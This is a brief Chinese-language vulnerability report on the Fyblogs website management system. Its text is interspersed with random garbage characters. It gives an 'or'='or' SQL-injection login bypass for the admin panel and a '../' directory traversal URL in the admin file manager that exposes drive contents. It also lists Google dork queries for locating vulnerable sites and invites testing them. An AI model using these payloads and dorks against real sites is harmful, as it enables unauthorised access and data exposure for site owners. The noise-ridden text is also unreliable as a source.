漏洞类型: 未授权访问/权限绕过
- }- r5 I% L3 B% E! G8 o6 r7 ^0 x9 @& R, ~; r$ W! u7 d" y7 J
简要描述:! z! ~$ l+ E' V7 ^# |
0 ~3 D8 `9 M! D8 j8 B# v/ b
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 E% w) }, ?# p0 L
* g' \( p' r( E* z1 [, \详细说明: p3 }( V7 W R2 O# p$ H9 q/ U" n
4 T) i: d" p9 z1 R
后台万能密码 'or'='or'* S! ]# T- F/ ]" f/ K5 U( C
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# c$ q" J* t* Q/ I% madmin/uploadfile.asp?currentFolder=/upfiles/../
7 n, \" [) y: @2 a* } m5 v7 z$ d/ Q$ `( p$ r/ f" R) W( [
漏洞证明:
% Q- M( R# X/ C0 X
s- g4 t( E+ I' Q谷歌:inurl:type.asp?id=1 新闻中心5 U7 A6 V: ^% l& M* G
或者 :inurl:download_ok.asp?
, D' T! x' O5 ]+ T6 @5 f2 F. E6 E* i" A
可以测试
- }; ^' K& w+ B8 N7 S6 a$ z; |) ^% i' g$ _5 W/ L+ S& W
\) v& |9 ?1 s- h9 x |